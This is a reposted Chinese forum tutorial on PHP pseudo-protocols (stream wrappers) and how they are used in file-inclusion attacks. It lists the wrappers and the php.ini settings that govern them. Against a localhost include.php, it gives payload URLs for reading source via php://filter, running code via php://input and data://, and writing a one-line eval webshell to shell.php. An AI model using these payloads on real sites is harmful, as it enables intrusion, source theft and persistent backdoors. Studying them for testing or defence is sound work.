php伪协议

单刀小丁 發表於 2019-11-6 13:59:00

<p> </p>
<h2>PHP支持的伪协议</h2>
<div class="cnblogs_Highlighter">
<pre class="brush:bash;gutter:true;">file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流（I/O streams）
zlib:// — 压缩流
data:// — 数据（RFC 2397）
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流
</pre>
</div>
<p> </p>
<h2>php.ini参数设置</h2>
<p>在php.ini里有两个重要的参数allow_url_fopen、allow_url_include。</p>
<p>allow_url_fopen:默认值是ON。允许url里的封装协议访问文件；</p>
<p>allow_url_include:默认值是OFF。不允许包含url里的封装协议包含文件；</p>
<p> </p>
<h2>各协议的利用条件和方法</h2>
<p><img src="https://img2018.cnblogs.com/i-beta/1853528/201911/1853528-20191106132336991-1666925658.png" alt=""></p>
<p> </p>
<p> </p>
<h2> </h2>
<h2>php://input</h2>
<p>php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。</p>
<p><strong>注：当enctype=”multipart/form-data”时，php://input是无效的。</strong></p>
<p> </p>
<h2><strong>file://</strong></h2>
<p>用于访问本地文件系统。当指定了一个相对路径（不以/、、\或 Windows 盘符开头的路径）提供的路径将基于当前的工作目录。</p>
<p>用法：</p>
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">1、file://[文件的绝对路径和文件名]
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
2、[文件的相对路径和文件名]
http://127.0.0.1/include.php?file=./phpinfo.txt
</pre>
</div>
<p>　　</p>
<h2>http://、https://</h2>
<p>URL 形式，允许通过 HTTP 1.0 的 GET方法，以只读访问文件或资源，通常用于远程包含。</p>
<p>用法：</p>
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;"></pre>
<pre class="hljs groovy"><code class="http"><span class="hljs-string">http:<span class="hljs-comment">//127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt</span></span></code></pre>
</div>
<p>　　</p>
<h2>php://</h2>
<p>php:// 用于访问各个输入/输出流（I/O streams），经常使用的是php://filter和php://input，php://filter用于读取源码，php://input用于执行php代码。</p>
<table>
<thead>
<tr><th>协议</th><th>作用</th></tr>
</thead>
<tbody>
<tr>
<td>php://input</td>
<td>可以访问请求的原始数据的只读流，在POST请求中访问POST的<code>data</code>部分，在<code>enctype="multipart/form-data"</code> 的时候<code>php://input </code>是无效的。</td>
</tr>
<tr>
<td>php://output</td>
<td>只写的数据流，允许以 print 和 echo 一样的方式写入到输出缓冲区。</td>
</tr>
<tr>
<td>php://fd</td>
<td>(>=5.3.6)允许直接访问指定的文件描述符。例如 <code>php://fd/3</code> 引用了文件描述符 3。</td>
</tr>
<tr>
<td>php://memory php://temp</td>
<td>(>=5.1.0)一个类似文件包装器的数据流，允许读写临时数据。两者的唯一区别是 <code>php://memory</code> 总是把数据储存在内存中，而 <code>php://temp</code> 会在内存量达到预定义的限制后（默认是 <code>2MB</code>）存入临时文件中。临时文件位置的决定和 <code>sys_get_temp_dir()</code> 的方式一致。</td>
</tr>
<tr>
<td>php://filter</td>
<td>(>=5.0.0)一种元封装器，设计用于数据流打开时的筛选过滤应用。对于一体式<code>（all-in-one）</code>的文件函数非常有用，类似 <code>readfile()</code>、<code>file()</code> 和 <code>file_get_contents()</code>，在数据流内容读取之前没有机会应用其他过滤器。</td>
</tr>
</tbody>
</table>
<p> </p>
<h3>php://filter参数详解</h3>
<table style="height: 158px; width: 742px" border="0"><caption>参数                                                                        描述</caption>
<tbody>
<tr>
<td>resource=<要过滤的数据流></td>
<td>必须项。它指定了你要筛选过滤的数据流。</td>
</tr>
<tr>
<td>read=<读链的过滤器></td>
<td>该参数可选。可以设定一个或多个过滤器名称，以管道符(|)分隔</td>
</tr>
<tr>
<td><em>write=<写链的筛选列表></em></td>
<td>该参数可选。可以设定一个或多个过滤器名称，以管道符(|)分隔</td>
</tr>
<tr>
<td><; 两个链的过滤器></td>
<td>任何没有以 <em>read=</em> 或 <em>write=</em> 作前缀的筛选器列表会视情况应用于读或写链。</td>
</tr>
</tbody>
</table>
<p> </p>
<h3>可用的过滤器列表（4类）</h3>
<table style="height: 72px; width: 573px">
<thead>
<tr><th>字符串过滤器</th><th>作用</th></tr>
</thead>
<tbody>
<tr>
<td>string.rot13</td>
<td>等同于<code>str_rot13()</code>，rot13变换</td>
</tr>
<tr>
<td>string.toupper</td>
<td>等同于<code>strtoupper()</code>，转大写字母</td>
</tr>
<tr>
<td>string.tolower</td>
<td>等同于<code>strtolower()</code>，转小写字母</td>
</tr>
<tr>
<td>string.strip_tags</td>
<td>等同于<code>strip_tags()</code>，去除html、PHP语言标签</td>
</tr>
</tbody>
</table>
<p> </p>
<p> </p>
<table>
<thead>
<tr><th>转换过滤器</th><th>作用</th></tr>
</thead>
<tbody>
<tr>
<td>convert.base64-encode & convert.base64-decode</td>
<td>等同于<code>base64_encode()</code>和<code>base64_decode()</code>，base64编码解码</td>
</tr>
<tr>
<td>convert.quoted-printable-encode & convert.quoted-printable-decode</td>
<td>quoted-printable 字符串与 8-bit 字符串编码解码</td>
</tr>
</tbody>
</table>
<p> </p>
<table>
<thead>
<tr><th>压缩过滤器</th><th>作用</th></tr>
</thead>
<tbody>
<tr>
<td>zlib.deflate & zlib.inflate</td>
<td>在本地文件系统中创建 gzip 兼容文件的方法，但不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。</td>
</tr>
<tr>
<td>bzip2.compress & bzip2.decompress</td>
<td>同上，在本地文件系统中创建 bz2 兼容文件的方法。</td>
</tr>
</tbody>
</table>
<p> </p>
<table style="height: 46px; width: 412px">
<thead>
<tr><th>加密过滤器</th><th>作用</th></tr>
</thead>
<tbody>
<tr>
<td>mcrypt.*</td>
<td>libmcrypt 对称加密算法</td>
</tr>
<tr>
<td>mdecrypt.*</td>
<td>libmcrypt 对称解密算法</td>
</tr>
</tbody>
</table>
<p> </p>
<h3>读取文件源码用法</h3>
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">php://filter/read=convert.base64-encode/resource=[文件名]
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
</pre>
</div>
<p>　</p>
<h3>执行php代码用法</h3>
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">php://input +
http://127.0.0.1/include.php?file=php://input

<?php phpinfo(); ?>
</pre>
</div>
<p>　　</p>
<h3>写入一句话木马用法</h3>
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">http://127.0.0.1/include.php?file=php://input

<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET); ?>'); ?>
</pre>
</div>
<p>　　</p>
<p> </p>
<p> </p>
<h2>phar://、zip://、bzip2://、zlib://</h2>
<p>用于读取压缩文件，<code>zip:// 、 bzip2:// 、 zlib://</code> 均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名，可修改为任意后缀：<code>jpg png gif xxx</code> 等等。</p>
<p> </p>
<h3>用法示例</h3>
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">1、zip://[压缩文件绝对路径]%23[压缩文件内的子文件名]（#编码为%23）
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt

2、compress.bzip2://file.bz2
http://127.0.0.1/include.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg<br>http://127.0.0.1/include.php?file=compress.bzip2://./file.jpg

3、compress.zlib://file.gz
http://127.0.0.1/include.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg<br>http://127.0.0.1/include.php?file=compress.zlib://./file.jpg<br><br>4、<code class="http">phar://</code></pre>
<pre class="hljs groovy"><code class="http"><span class="hljs-string">http:<span class="hljs-comment">//127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt</span></span></code></pre>
</div>
<p>　　</p>
<p> </p>
<h2>data://</h2>
<p>数据流封装器，以传递相应格式的数据。通常可以用来执行PHP代码。</p>
<h3>示例用法</h3>
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">1、data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

2、data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
</pre>
</div>
<p>　　</p>
<p> </p>
<p> </p>
<p> </p><br><br>
来源：https://www.cnblogs.com/endust/p/11804767.html

頁: [1]

琼殿技术论坛's Archiver

php伪协议